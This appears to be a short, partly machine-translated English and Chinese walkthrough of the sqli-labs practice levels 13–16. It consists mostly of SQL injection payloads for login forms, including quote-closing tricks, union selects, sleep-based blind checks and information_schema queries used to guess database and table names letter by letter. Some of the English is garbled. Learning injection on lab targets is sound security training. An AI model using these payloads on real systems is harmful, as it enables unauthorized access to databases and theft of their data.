less13
First and 12 off the same user name and password will echo off 12 off 13 did not return significant content
uname = admin & passwd = admin & submit = Submit this case just shows successful landing, but will not display additional information.
The user name into other login fails uname = adm & passwd = admin & submit = Submit
uname = adm 'or 1 = 1 # & passwd = admin & submit = Submit error will prompt statement
Direct know how to construct the information given by the structure: 1 ') or 1 = 1 #
Suppose there are two columns uname = adm ') or union select 1,2, # & passwd = admin & submit = Submit error
Guess database:
No echo information to consider using blinds
uname=adm ') or if(length(database())>7,1,sleep(5)) # & passwd=admin & submit=Submit
if (length (database ())> 8,1, sleep (5))> 8 displays are connected to the database name is not returned immediately guessed length 8
The first uname = adm ') or left (database (), 1)>' a '# determination database
或者使用uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit
Manually enter the more difficult we use brute force
uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #&passwd=admin&submit=Submit
猜出第一个字母是i
flag.jpg则显示登录成功
接下来判断第2位
以此类推 猜出345。。位数据库名字
less14
uname=admin &passwd=admin&submit=Submit
uname=admin '# &passwd=admin&submit=Submit
uname=admin " # &passwd=admin&submit=Submit
uname=admi" or length(database())='8'#&passwd=admin&submit=Submit
13关 是’)
14关是 ”
15关是 '
16关是 ”)
查询语句
uname=admi" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a'#&passwd=admin&submit=Submit
uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit
判断长度
uname = adminadmin&passwd=admiand") or if(length(database())>1,1,sleep(5))#&submit=Submit通过这个来判断其长度
uname=adminadmin&passwd=admiand”) or if(length()>1000,1,sleep(5))#&submit=Submit